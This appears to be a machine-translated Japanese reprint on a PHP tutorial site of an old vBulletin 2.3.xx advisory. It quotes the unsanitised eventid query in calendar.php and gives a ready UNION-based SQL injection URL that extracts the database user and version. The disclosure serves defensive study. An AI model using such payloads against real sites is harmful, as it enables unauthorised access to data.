コミュニティ 学ぶ ツールライブラリ レジャー
検索
日本語
ホームページ > バックエンド開発 > PHPチュートリアル > 本文

vBulletin フォーラム 2.3.xx SQL インジェクション_PHP チュートリアル

WBOY
リリース: 2016-07-21 16:09:26
オリジナル
1007 人が閲覧しました


vBulletin フォーラム 2.3.xx SQL インジェクション Calendar.php.

にはSQLインジェクションの問題が存在します-------- Calendar.phpの585行目から切り取り ----------
else if ($action == "edit" )
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM Calendar_events WHEREeventid = $eventid");
---------- ----------------------------------------

MySQLのバージョンが大きい場合4.00 よりも、UNION 攻撃が使用できるようになりました。

-------------------------------------- ---
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(), version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
------------------------ -----------------

query_first 関数はクエリ結果の最初の行のみを返すため、!
必要な行を返すようにしてください。

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/314536.html技術記事 vBulletin フォーラム 2.3.xx SQL インジェクションcalendar.php に SQL インジェクションの問題が存在します。 -------- Calendar.php の 585 行目から切り取り ---------- else if ($action == "edit") { $eventi...
関連ラベル:
sql vbulletin
ソース:php.cn
前の記事:セクション 11 [11]_PHP チュートリアルのリロード 次の記事:PHP4 真の OO_PHP チュートリアル
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
著者別の最新記事
最新の問題
function_exists() はカスタム関数を決定できません Function test () {return true;} if (function_exists ('test')) {echo "テストは関数です";
から 2024-04-29 11:01:01
0
2
2012
Google Chromeのモバイル版を表示する方法 こんにちは、先生、Google Chrome をモバイル版に変更するにはどうすればよいですか?
から 2024-04-23 00:22:19
0
10
2171
子ウィンドウは親ウィンドウを操作しますが、出力は応答しません。 最初の 2 つの文は実行可能ですが、最後の文は実装できません。
から 2024-04-19 15:37:47
0
1
1835
親ウィンドウには出力がありません document.onclick = function(){ window.opener.document.write('私は子ウィンドウの出力です');
から 2024-04-18 23:52:34
0
1
1728
CSS マインド マッピングに関するコースウェアはどこにありますか? コースウェア
から 2024-04-16 10:10:18
0
0
1747
関連トピック
詳細>
人気のおすすめ
人気のチュートリアル
詳細>
関連するチュートリアル
人気のおすすめ
最新のコース
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート